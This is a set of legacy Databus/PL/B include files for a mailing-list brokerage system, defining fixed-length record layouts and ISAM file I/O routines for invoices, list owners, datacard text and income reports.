ASADD DIM 1 93-93 CORRECTION OR ADDITIONAL BILL CODE (1 OR2).
ASSTAX form 5.2 94-101 STATE TAX ADJUSTMENT.
ASPOST form 5.2 102-109 POSTAGE ADJUSTMENT.
ASCITY form 5.2 110-117 CITY TAX ADJUSTMENT.
ASCNTCT DIM 3 118-120 CONTACT/BROKER CODE.
ASINVNO DIM 6 121-126 INVOICE NUMBER.
ASCRDTE DIM 8 127-134 CREDIT DATE CCYYMMDD
ASINDTE DIM 8 135-142 FROM INVOICE RECORD CCYYMMDD
ASAMNUM DIM 2 143-144 INVOICE AMENDMENT NUMBER.
ASTAT DIM 1 145-145 INVOICE STATUS FROM INVOICE RECORD.
.begin patch 1.3
.ASBLANK6 DIM 6 146-151 NOT USED
ASXNINC form 10.2 146-158 Non comm INCOME ADJUSTMENT. inter company
ASBLANK DIM 15 159-173 NOT USED
.end patch 1.3
listend
.ASCODE DIM 1 1-1 'J'
.ASTATUS DIM 1 2-2 '0' OR 'P'
..begin patch 1.1
.ASMLRNUM DIM 4 3-6 MAILER NUMBER FROM INVOICE RECORD.
.ASLRNUM DIM 6 7-12 LR NUMBER - KEY.
..ASBILLTO DIM 1 13-13 BILL-TO CODE (0-9).
..ASPAYTO DIM 1 14-14 PAY-TO CODE (0-9).
..ASRECADJ DIM 7 15-21 ACCOUNTS RECEIVABLE ADJUSTMENT.
..ASPAYAD1 DIM 7 22-28 ACCOUNTS PAYABLE 1 ADJUSTMENT.
..ASPAYAD2 DIM 7 29-35 ACCOUNTS PAYABLE 2 ADJUSTMENT.
..ASBLANK1 DIM 1 36-36 NOT USED.
..ASLRINC DIM 6 37-42 LIST RENTAL INCOME ADJUSTMENT.
.ASRECADJ form 10.2 13-25 ACCOUNTS RECEIVABLE ADJUSTMENT.
.ASPAYAD1 form 10.2 26-38 ACCOUNTS PAYABLE 1 ADJUSTMENT.
.ASPAYAD2 form 10.2 39-41 ACCOUNTS PAYABLE 2 ADJUSTMENT.
.ASPAYAD3 form 10.2 42-54 ACCOUNTS PAYABLE 3 ADJUSTMENT.
.ASLRINC form 10.2 55-67 LIST RENTAL INCOME ADJUSTMENT.
.ASNININC form 10.2 68-80 LIST RENTAL INCOME ADJUSTMENT.
..end patch 1.1
.ASREUSE DIM 1 81-81 RE-USE/RUN CHARGE CODE (1-4).
.ASCRDB DIM 1 82-82 CREDIT OR DEBIT CODE (C 0R D).
.ASADD DIM 1 83-83 CORRECTION OR ADDITIONAL BILL CODE (1 OR2).
..begin patch 1.1
..ASSTAX DIM 5 46-50 STATE TAX ADJUSTMENT.
..ASPOST DIM 4 51-54 POSTAGE ADJUSTMENT.
..ASCITY DIM 5 55-59 CITY TAX ADJUSTMENT.
.ASSTAX form 5.2 84-91 STATE TAX ADJUSTMENT.
.ASPOST form 5.2 92-99 POSTAGE ADJUSTMENT.
.ASCITY form 5.2 100-117 CITY TAX ADJUSTMENT.
..ASREASON DIM 2 60-61 ADJUSTMENT REASON CODE (1-23).
..end patch 1.1
.ASCNTCT DIM 3 118-120 CONTACT/BROKER CODE.
.ASINVNO DIM 6 121-126 INVOICE NUMBER.
..begin patch 1.1
..ASCRDTE DIM 6 71-76 CREDIT DATE MMDDYY.
..ASINDTE DIM 6 77-82 FROM INVOICE RECORD MMDDYY.
..ASAMNUM DIM 1 83-83 INVOICE AMENDMENT NUMBER.
.ASCRDTE DIM 8 127-134 CREDIT DATE CCYYMMDD
.ASINDTE DIM 8 135-142 FROM INVOICE RECORD CCYYMMDD
.ASAMNUM DIM 2 143-144 INVOICE AMENDMENT NUMBER.
..end patch 1.1
.ASTAT DIM 1 145-145 INVOICE STATUS FROM INVOICE RECORD.
.ASBLANK6 DIM 6 146-151 .
.PROGRAM ACCESS.
.NAME TYPE ACCESS
<file_sep>/include/Common.inc
. Last change: DLH 6/11/2002 10:23:04 AM
..............................................................................
.
. COMMON
.
. COMMON UDA VARIABLES
.
ERROR DIM *35 DATASHARE ERROR MESSAGE
TODAY DIM *8 DATE IN mm/dd/yy FORMAT
SECURITY FORM *1
FUNC DIM *2
TYPINIT DIM *2 TYPIST INITIALS
PORTN FORM *3 SOFT PORT NUMBER
AGENDAID DIM *6 AGENDA ID NUMBER
JULIAN FORM *5 TODAY IN yyjjj FORMAT
USER DIM *10 USER ID
USERNME DIM *10 USER NAME (FIRST INIT, LAST)
PRIO FORM *3 OVERALL PRIORITY LEVEL
LEVELS DIM *36 SECURITY LEVELS
COMM DIM *1 COMMUNICATION ALLOWED
.
COMPANY FORM *1 COMPANY CODE (0,1-NIN,2-PL (03/27/2007)
COMPNME DIM *24 COMPANY NAME TEXT
MULTCOS FORM *1 MULTIPLE COMPANIES ALLOWED
CURSYS FORM *1 CURRENT SYSTEM
CURLEVL FORM *1 CURRENT LEVEL WITHIN SYSTEM
MULTSYS FORM *1 MULTIPLE SYSTEMS ALLOWED
PROGRAM DIM *8 LAST PROGRAM NAME
COMMENT DIM *30
INITS DIM *3 USER INITIALS
EXIT FORM *2 EXIT ALLOWED
INPNAME DIM *25 INPUT FILE NAME
OUTNAME DIM *25 OUTFILE NAME
PRTNAME DIM *25 PRINT FILE NAME (/PRT ASSUMED)
.path DIM *45 use Path name ie \\nts0\c\data\text
.Subject dim *30
.
..............................................................................
<file_sep>/include/nowndd104.inc
..............................................................................
.
. NOWNDD INCLUSION
. NIN OWNER FILE DEFINITION
.
. FILE NAME : NINOWN
. REC LENGTH: 190 FIXED
. INDEX KEY : 3-6 (OWNLON)
. AIM KEY : 7-56
. 09Dec2000 Change IP address of File manager DMB
. 09Dec2000 use filelist
..10sep96 inactive code, batch code for lcr's, century - dlh
..16may95 add 2nd fax number for accounting.
..............................................................................
.
.NOWNNAME INIT "NINOWN.dat|20.20.30.104:502"
NOWNNAME INIT "NINOWN.dat|10.10.30.104:502"
NOWNFLD DIM 4
OwnFList Filelist
.NOWNFLE1 IFILE KEYLEN=4,FIXED=190,Name="NINOWN.isi|20.20.30.104:502"
NOWNFLE1 IFILE KEYLEN=4,FIXED=190,Name="NINOWN.isi|10.10.30.104:502"
.NOWNFLE2 AFILE FIXED=190,Name="NINOWN.AAM|20.20.30.104:502"
NOWNFLE2 AFILE FIXED=190,Name="NINOWN.AAM|10.10.30.104:502"
.NOWNFLE1 IFILE KEYLEN=4,FIXED=190,Name="NINOWN.isi"
.NOWNFLE2 AFILE FIXED=190,Name="NINOWN.AAM"
filelistend
NOWNFLE3 FILE FIXED=190
NOWNFLD2 DIM 53
NOWNFLG1 FORM 1
NOWNFLG2 FORM 1
NOWNFLG3 FORM 1
NOWNPATH FORM 1
.
ownvars list
OWNLOC DIM 1 001-002 'B'
OWNBLK DIM 1 002-002 BLANK '0' 6/10/05 Using this byte to hold Sample Info ASH
OWNLON DIM 4 003-006 OWNER NUMBER
OWNLONM DIM 25 007-031 CONTACT NAME
OWNOCPY DIM 25 032-056 COMPANY NAME
OWNLOSA DIM 25 057-081 ADDRESS
OWNLOCTY DIM 15 082-096 CITY
OWNLOS DIM 2 097-098 STATE
OWNLOZC DIM 10 099-108 ZIP CODE
OWNNEC DIM 1 109-109 NUMBER OF CARBON COPIES
OWNCTN DIM 16 110-125 CARBON COPY TO
OWNTELE DIM 10 126-135 TELEPHONE NUMBER
OWNPASS DIM 10 136-144 PERSON LAST UPDATED BY
OWNRDTE DIM 8 145-153 REVISED DATE mm,dd,cc,yy
owngally dim 1 154-154 'T'rue = lcr's get combined request
OWNTAXID DIM 15 155-169 TEFRA TAX ID CODE.
OWNFAX DIM 10 170-179 FAX NUMBER.
ownfax2 dim 10 178-189 2nd fax ie acct.
OWNstat DIM 1 190-190 BLANK, "I"nactive
listend
..............................................................................*
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
LISTON
<file_sep>/include/MDCMSCIO.inc
..............................................................................
.******************************************************
.* MISC List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MMSC DATACARD FILES.
.* ****************************************************
.
. FILE:
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing MMSC, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : MMSCKEY
. REQUIRED : 'MMSCFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MMSCKEY BRANCH MMSCFlag TO MMSC1
CALL MMSCOpen
MMSC1 FILEPI 1;MMSCFile
READ MMSCFile,MMSCFld;MMSCVars
RETURN
..............................................................................
.
. ENTRY POINT : MMSCTST
. REQUIRED : MMSCFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
MMSCTST BRANCH MMSCFlag TO MMSC2
CALL MMSCOpen
MMSC2 FILEPI 1;MMSCFile
READ MMSCFile,MMSCFld;STR1
RETURN
..............................................................................
.
. ENTRY POINT : MMSCKS
. REQUIRED :
. RETURNED : MMSC Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
MMSCKS BRANCH MMSCFlag TO MMSC3
CALL MMSCOpen
MMSC3 FILEPI 1;MMSCFile
READKS MMSCFile;MMSCVars
RETURN
..............................................................................
. ENTRY POINT : MMSCSEQ
. REQUIRED :
. RETURNED : MMSC Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
MMSCSEQ BRANCH MMSCFlag TO MMSC4
CALL MMSCOpen
MMSC4 FILEPI 1;MMSCFile
READ MMSCFile,SEQ;MMSCVars
RETURN
..............................................................................
.
. ENTRY POINT : MMSCWRT
. REQUIRED : 'MMSCFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
MMSCWRT BRANCH MMSCFlag TO MMSC5
CALL MMSCOpen
MMSC5 FILEPI 1;MMSCFile
WRITE MMSCFile,MMSCFld;MMSCVars
RETURN
..............................................................................
.
. ENTRY POINT : MMSCUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
MMSCUPD BRANCH MMSCFlag TO MMSC6
CALL MMSCOpen
MMSC6
FILEPI 1;MMSCFile
UPDATE MMSCFile;MMSCVars
RETURN
..............................................................................
.
. ENTRY POINT : MMSCDEL
. REQUIRED : 'MMSCFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
MMSCDEL BRANCH MMSCFlag TO MMSC7
CALL MMSCOpen
MMSC7 FILEPI 1;MMSCFile
DELETE MMSCFile,MMSCFld
RETURN
..............................................................................
.
. ENTRY POINT : MMSCOpen
. REQUIRED : 'MMSCFlag' 'MMSCPATH'
. RETURNED : 'MMSCFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
MMSCOpen TRAP MMSCGONE giving error IF IO
OPEN MMSCFile,MMSCName
TRAPCLR IO
MOVE C1 TO MMSCFlag
RETURN
..............................................................................
MMSCGONE MOVE MMSCNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/LIncdd.inc
..............................................................................
.
. LIncDD LIncUSION
. NIN Income report Data Descriptors
.
. FILE NAME : ListIncome.dat
. REC LENGTH: 533 FIXED
. INDEX KEY : (1) 1-6 (List #) dupes allowed
. Record ID (2) 7-12 record ID no dupes
.INcome by List data descriptor
.used for List management income reporting to Owners
.
.
.
LincFLIST Filelist
LIncFILE IFILE KEYLEN=6,FIXED=533,Name="ListIncome.ISI|NINS1:502"
LIncFILE1 IFILE KEYLEN=6,FIXED=533,noduplicates,Name="ListIncome1.ISI|NINS1:502"
Filelistend
LIncNAME INIT "ListIncome.ISI|NINS1:502"
LIncNAME1 INIT "ListIncome1.ISI|NINS1:502"
LIncFLD DIM 6
LIncFLD1 DIM 6
LIncFLAG FORM 1
LincPath Form 1
LIncVARS LIST
LIncList DIM 6 1-6 .list number
LincREcID Dim 6 7-12 .unique record ID
LINCDATEBY DIM 1 13-13 'M' by Mail date, 'O' by Order date
LIncTYPE DIM 1 14-14 Basis 'C' Cash, 'I' Invoice
. 2 Records required if Both Cash & Accrual
LMONTH FORM 2 15-16 Fiscal Month '1-12'
LIncREP1 DIM 1 17-17 Report option 1 Type 'M' Monthly, 'Q' Quarterly,
. 2 Records required if Both monthly & quarterly
LIncREP2 DIM 1 18-18 Report option 2 report with projections 'Y' = Include Variance
LIncREP3 DIM 1 19-19 Report option 3 Not used
.LIncYEAR FORM 4 20-23 Beginning year for report (drop data prior to being our list)
LIncYEAR FORM 8 20-27 Beginning year for report (drop data prior to being our list) ccyymmdd
LIncRECIPIENT DIM 255 28-282 Email address of recipient
LIncAuto DIm 1 283-283 "Y" if report runs auto
LIncInits dim 3 284-285 Last updated by
LIncCOMMENTS DIM 247 286-533 not used
listend
<file_sep>/include/SRDSSELDD.inc
.******************************************************
.* SRDS List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* SRDS DATACARD FILES.
.* ****************************************************
.
. FILE: SRDS_SEL
. LENGTH: FIXED=140
. COMPRESS: NONE
. TYPE:
......................................................
. LAST MODIFIED
. 10 MAy 2011 DLH New
......................................................
SRDSSELNAME Init "SRDS_SEL.Isi|NINS1:502"
SRDSSELFlist Filelist
SRDSSELFILE IFILE Keylen=6,Fixed=140,Name="SRDS_SEL.Isi|NINS1:502"
SRDSSELFiLE2 IFILE Keylen=10,Fixed=140,Name="SRDS_SEL2.Isi|NINS1:502"
FileListEnd
SRDSSELSFILE FILE
SRDSSELFLAG FORM 1
SRDSSELPATH FORM 1
SRDSSELFld Dim 6 .list number
SRDSSELFld2 Dim 10 .list number & select number
.
SRDSSELVARS List
SRDSSELLIST DIM 6 1-6 LIST NUMBER
SRDSSELNUM DIM 4 7-10 SELECT NUMBER
SRDSSELSNAME DIM 75 11-85 SELECT NAME
SRDSSELQTY DIM 10 86-95 SELECT QUANTITY
SRDSSELPRICE FORM 5.2 96-103 SELECT CODE PRICE
SRDSSELPCOMM DIM 1 104-104 SELECT PRICE IS COMMISSIONABLE
SRDSSELDESC DIM 3 105-107 SELECT PRICE MODIFIER
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /M
. "002" /FLAT
. "003" /EACH
. "004" /MIN
. "005" N/A
. "006" N/C
. "007" SEEBASE
. "008" SEEDESC
. "009" INQUIRE
SRDSSELINACTIVE DIM 1 108-108 SELECT INACTIVE? 1 = YES
SRDSSELSTATUS DIM 1 109-109 SELECT STATUS
. 1 = SPECIAL(DOES NOT PRINT ON DATACARD)
. 2 = OFFICE USE ONLY
. 3 =
.
SRDSSELNOTES DIM 1 110-110 1 = INDICATES USER SHOULD VIEW NOTES ABOUT THIS SELECT
SRDSSELEXC DIM 1 111-111 1 = Exc/Rent, 2 = Exchange Only, 3 = Rental Only
SRDSSELBASE DIM 4 112-115 SELECT NUMBER OF ASSOCIATED BASE - BASE RECORDS WILL HOLD BLANK VALUE!!
. BASE = BASE - ONLY ONE PER DATACARD
. SEC. = SECONDARY BASE
. Nxxx = NUMBER OF BASE/SECONDARY BASE
. " " = NEITHER BASE NOR SELECT OFF OF BASE
SRDSSELINDEX DIM 4 116-119 INDEX FOR PRINTING/DISPLAY
SRDSSELDATE DIM 8 120-127 SELECT DATE
SRDSSELINIT DIM 3 128-130 USER INITIALS
SRDSSELFILLER DIM 10 131-140 FILLER
LISTEND
<file_sep>/include/ntxt1io.inc
..............................................................................
.
. Ntxt1IO INCLUSION
. NIN DATACARD TEXT FILE I/O ROUTINES
.
. FILE NAME : NINtxt1
. REC LENGTH: 510 VAR
. INDEX KEY : 1-9 (6 BYTE LIST NUMBER + 3 BYTE RECORD #)
.
..............................................................................
.
. ENTRY POINT : Ntxt1KEY
. REQUIRED : 'Ntxt1FLD'
. RETURNED : DATACARD TEXT RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
Ntxt1KEY Branch Ntxt1pATH OF NTXT11A,NTXT11C
NTXT11A BRANCH Ntxt1FLAG,Ntxt11B
CALL Ntxt1OPEN
Ntxt11B
trap IOMssg giving Error if IO
FILEPI 1;Ntxt1FILE
READ Ntxt1FILE,Ntxt1FLD;Ntxt1VARS
trapclr IO
RETURN
NTXT11C BRANCH Ntxt1FLAG,Ntxt11d
CALL Ntxt1OPEN
Ntxt11D
trap IOMssg giving Error if IO
FILEPI 1;Ntxt1FLE1
READ Ntxt1FLE1,Ntxt1FLD1;Ntxt1VARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1TST
. REQUIRED : Ntxt1FLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
Ntxt1TST Branch Ntxt1pATH OF NTXT12A,NTXT12C
Ntxt12A BRANCH Ntxt1FLAG,Ntxt12B
CALL Ntxt1OPEN
Ntxt12B
trap IOMssg giving Error if IO
FILEPI 1;Ntxt1FILE
READ Ntxt1FILE,Ntxt1FLD;;
trapclr IO
RETURN
Ntxt12C BRANCH Ntxt1FLAG,Ntxt12D
CALL Ntxt1OPEN
Ntxt12d
trap IOMssg giving Error if IO
FILEPI 1;Ntxt1FLE1
READ Ntxt1FLE1,Ntxt1FLD1;;
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1KS
. REQUIRED :
. RETURNED : DATACARD TEXT RECORD
. DESCRIPTION : KEY SEQUENTIAL DATACARD TEXT FILE READ
.
Ntxt1KS Branch Ntxt1pATH OF NTXT13A,NTXT13C
NTXT13A
BRANCH Ntxt1FLAG,Ntxt13B
CALL Ntxt1OPEN
Ntxt13B
trap IOMssg giving Error if IO
FILEPI 1;Ntxt1FILE
READKS Ntxt1FILE;Ntxt1VARS
trapclr IO
RETURN
NTXT13C
BRANCH Ntxt1FLAG,Ntxt13D
CALL Ntxt1OPEN
Ntxt13D
trap IOMssg giving Error if IO
FILEPI 1;Ntxt1FLE1
READKS Ntxt1FLE1;Ntxt1VARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1SEQ
. REQUIRED :
. RETURNED : DATACARD TEXT RECORD
. DESCRIPTION : SEQUENTIAL DATACARD TEXT FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
Ntxt1SEQ
BRANCH Ntxt1FLAG,Ntxt14
CALL Ntxt1OPEN
Ntxt14
trap IOMssg giving Error if IO
FILEPI 1;Ntxt1FILE
READ Ntxt1FILE,SEQ;Ntxt1VARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1WRT
. REQUIRED : 'Ntxt1FLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY txt1/ISI INSERT
.
Ntxt1WRT
BRANCH Ntxt1FLAG,Ntxt15
CALL Ntxt1OPEN
Ntxt15
trap IOMssg giving Error if IO
FILEPI 1;Ntxt1FLIST
WRITE Ntxt1FLIST;Ntxt1VARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1UPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
.
Ntxt1UPD
BRANCH Ntxt1FLAG,Ntxt16
CALL Ntxt1OPEN
Ntxt16
trap IOMssg giving Error if IO
FILEPI 1;Ntxt1FLIST
UPDATE Ntxt1FLIST;Ntxt1VARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1DEL
. REQUIRED : 'Ntxt1FLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY txt1/ISI DELETE
.
Ntxt1DEL
BRANCH Ntxt1FLAG,Ntxt17
CALL Ntxt1OPEN
Ntxt17
trap IOMssg giving Error if IO
FILEPI 1;Ntxt1FLIST
DELETE Ntxt1FLIST
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1OPEN
. REQUIRED : 'Ntxt1FLAG'
. RETURNED : 'Ntxt1FLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN DATACARD TEXT FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
Ntxt1OPEN
TRAP Ntxt1GONE giving Error if IO
OPEN Ntxt1FLIST .,EXCLUSIVE
trapclr IO
MOVE C1,Ntxt1FLAG
RETURN
.
Ntxt1GONE
MOVE Ntxt1NAME,FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/DEVELOP/Includes - why/NDatCntio.inc
..............................................................................
.
.
. NIN datacard / Min CNT info FILE I/O ROUTINES
.
.
. FILE NAME : NINdatCnt
. REC LENGTH: 120 FIXED
..............................................................................
.
. ENTRY POINT : NdatCntKEY
. REQUIRED : 'NdatCntFLD'
. RETURNED : OWNER RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NdatCntKEY BRANCH NdatCntFlag TO NdatCnt1
CALL NdatCntOPEN
NdatCnt1 FILEPI 1;NdatCntFLE1
READ NdatCntFLE1,NdatCntFLD;NDatCntvars
RETURN
..............................................................................
.
. ENTRY POINT : NdatCntTST
. REQUIRED : NdatCntFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
NdatCntTST BRANCH NdatCntFlag TO NdatCnt2
CALL NdatCntOPEN
NdatCnt2 FILEPI 1;NdatCntFLE1
READ NdatCntFLE1,NdatCntFLD;STR1
RETURN
..............................................................................
.
. ENTRY POINT : NdatCntKS
. REQUIRED :
. RETURNED : OWNER RECORD
. DESCRIPTION : KEY SEQUENTIAL OWNER FILE READ
.
NdatCntKS BRANCH NdatCntFlag TO NdatCnt3
CALL NdatCntOPEN
NdatCnt3 FILEPI 1;NdatCntFLE1
READKS NdatCntFLE1;NDatCntvars
RETURN
..............................................................................
. ENTRY POINT : NdatCntSEQ
. REQUIRED :
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
NdatCntSEQ
BRANCH NdatCntFlag TO NdatCnt4
CALL NdatCntOPEN
NdatCnt4 FILEPI 1;NdatCntFLE1
READ NdatCntFLE1,SEQ;NDatCntvars
RETURN
..............................................................................
.
. ENTRY POINT : NdatCntWRT
. REQUIRED : 'NdatCntFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NdatCntWRT BRANCH NdatCntFlag TO NdatCnt5
CALL NdatCntOPEN
NdatCnt5 FILEPI 1;NdatCntFLE1
WRITE NDatCntFList;NDatCntvars
RETURN
..............................................................................
.
. ENTRY POINT : NdatCntUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE OWNER FILE
.
NdatCntUPD BRANCH NdatCntFlag TO NdatCnt6
CALL NdatCntOPEN
NdatCnt6
UPDATE NDatCntFList;NDatCntvars
RETURN
..............................................................................
.
. ENTRY POINT : NdatCntDEL
. REQUIRED : 'NdatCntFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NdatCntDEL BRANCH NdatCntFlag TO NdatCnt7
CALL NdatCntOPEN
NdatCnt7 FILEPI 1;NdatCntFLE1
DELETE NDatCntFList
RETURN
..............................................................................
.
. ENTRY POINT : NdatCntAIM
. REQUIRED : NdatCntFLD2
. RETURNED : OWNER RECORD
. DESCRIPTION : AIM OWNER FILE READ
. APPLICA TION'S RESPONSIBILITY TO TEST FLGS
.
NdatCntAIM BRANCH NdatCntFlag TO NdatCnt8
CALL NdatCntOpen
NdatCnt8 FILEPI 1;NdatCntFLE2
READ NdatCntFLE2,NdatCntFLD2;NDatCntvars
RETURN
..............................................................................
.
. ENTRY POINT : NdatCntKG
. REQUIRED : VALID PREVIOUS AIM READ
. RETURNED : OWNER RECORD
. DESCRIPTION : AIM KEY GENEREIC OWNER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NdatCntKG BRANCH NdatCntFlag TO NdatCnt10
CALL NdatCntOpen
NdatCnt10 FILEPI 1;NdatCntFLE2
READKG NdatCntFLE2;NDatCntvars
RETURN
..............................................................................
.
. ENTRY POINT : NdatCntKGP
. REQUIRED : PREVIOUS VALID AIM READ
. RETURNED : OWNER RECORD
. DESCRIPTION : KEY GENERIC PRIOR OWNER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NdatCntKGP BRANCH NdatCntFlag TO NdatCnt11
CALL NdatCntOpen
NdatCnt11 FILEPI 1;NdatCntFLE2
READKGP NdatCntFLE2;NDatCntvars
RETURN
...............................................................................
.
. ENTRY POINT : NdatCntOPEN
. REQUIRED : 'NdatCntFlag' 'NdatCntPATH'
. RETURNED : 'NdatCntFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN OWNER FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NdatCntOPEN
TRAP NdatCntGONE giving error IF IO
OPEN NDatCntFList
TRAPCLR IO
MOVE C1 TO NdatCntFlag
RETURN
..............................................................................
NdatCntGONE MOVE NdatCntNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/Infodd.inc
include common.inc
include cons.inc
include norddd.inc
include nmlrdd.inc
include nmlr2dd.inc
include nxrfdd.inc
include nbrkdd.inc
include nbrk2dd.inc
include ndatdd.inc
include nrtndd.inc
include nmdldd.inc
include nusedd.inc
.Pointers to Objects
InfoWindPtr Window ^
InfoEditPtr EditText ^
InfoEditPtr1 EditText ^
.Actual Objects
InfoListView ListView
InfoEditText EditText
DimPtr Dim ^
DimPtr1 Dim ^
DimPtr2 Dim ^
DimPtr3 Dim ^
FrmPtr Form ^
.
OrderInfoString dim 47
ScrRight form 4
ScrBottom form 4
MouseForm form 10
FarRight form 4
FarBottom form 4
T1 form 4
L1 form 4
include nordio.inc
include nmlrio.inc
include nmlr2io.inc
include nxrfio.inc
include nbrkio.inc
include nbrk2io.inc
include ndatio.inc
include nrtnio.inc
include nmdlio.inc
include nuseio.inc
include comlogic.inc
<file_sep>/DEVELOP/CatCodes/ndatdd.inc
******************************************************
* DATACARD FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS MASTER DATACARD FILE.
* ****************************************************
.
. FILE: NINDAT
. LENGTH: 600
. COMPRESS: NONE
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 2-7 LSTNUM
. 64-138 MLSTNAME
.AIMDEX KEY: 2-7 LSTNUM
. 64-138 MLSTNAME
. 14-19 DATFUL
. 1-1 STATUS
. 32-32 NEW BYTE
. 33-33 EXCLUSIVE BYTE
......................................................
. LAST MODIFIED
. patch 1.3 29JUNE2006 DMS - Add search, as per 6/12/2006 CTF Meeting
. patch 1.2 21JUNE2006 ASH - Added aamdex for Fulfillment Number
. - 06Jul04 DLH Added NDatLUsage
. - 29Jul02 ASH Began conversion Process
;Secondary FIles See
; include ntxtdd.inc - DATACARD TEXT FILE
; include nadddd.inc - address codes
; include narrdd.inc - Arrangement codes
; include ncatdd.inc - CATEGORY FILE DESCRIPTOR.
; include NSLTdd.inc - SELECTION CODE FILE DESCRIPTOR.
; include nsrcdd.inc - SOURCE CODE FILE DESCRIPTOR.
; include nmoddd.inc - PRICE MODIFIER FILE DESCRIPTOR.
. include nusedd.inc - VARIaBLES MODULE FOR DATABUS PORT/USER IDENTIFICATION.
.
. - 18JUN2005 DMB IP Address changed for File Manager
. - 06Apr2005 ASH Modifed COMMPER
. - 15Nov95 DLH add key by name
. - 12/10/85 ADDED ONE BYTE TO EACH CATEGORY CODE, DELETED
. BLANK8. RECORD SIZE NOW VARIABLE TO MAX 2813.
......................................................
NDATNAME DIM 8
NDATNME1 INIT "NINDAT "
NDATNME2 INIT "NINDAT "
NDATNME3 INIT "NINDAT4 " 3 is used for tdmc info (argh)
NDATFLIST FILELIST
.NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI|20.20.30.103:502"
.START PATCH 1.2.8 REPLACED LOGIC
.NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI|10.10.30.103:502"
..NDATFLE3 IFILE KEYLEN=55,FIXED=600,Name="NINDAT4.ISI|20.20.30.103:502"
.NDATFLE3 IFILE KEYLEN=75,FIXED=600,Name="NINDAT4.ISI|10.10.30.103:502"
..NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM|20.20.30.103:502"
.NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM|10.10.30.103:502"
NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI"
NDATFLE3 IFILE KEYLEN=75,FIXED=600,Name="NINDAT4.ISI"
NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM"
.END PATCH 1.2.8 REPLACED LOGIC
.NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI"
.NDATFLE3 IFILE KEYLEN=55,FIXED=600,Name="NINDAT4.ISI"
.NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM"
FILELISTEND
NDATLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NDATFLD DIM 6
NDATFLD1 DIM 9
NDATFLD2 DIM 78
NDATFLD3 DIM 75
.START PATCH 1.2 ADDED LOGIC
NDATFLD4 DIM 9
.END PATCH 1.2 ADDED LOGIC
.START PATCH 1.3 ADDED LOGIC
NDATFLD5 DIM 4
NDATFLD6 DIM 4
NDATFLD7 DIM 4
.END PATCH 1.3 ADDED LOGIC
NDATFLAG FORM 1
NDATPATH FORM 1
.
DATVARS LIST
STATUS DIM 1 1-1 'W' FOR WITHDRAWN.
LSTNUM DIM 6 2-7 ZERO FILLED KEY.
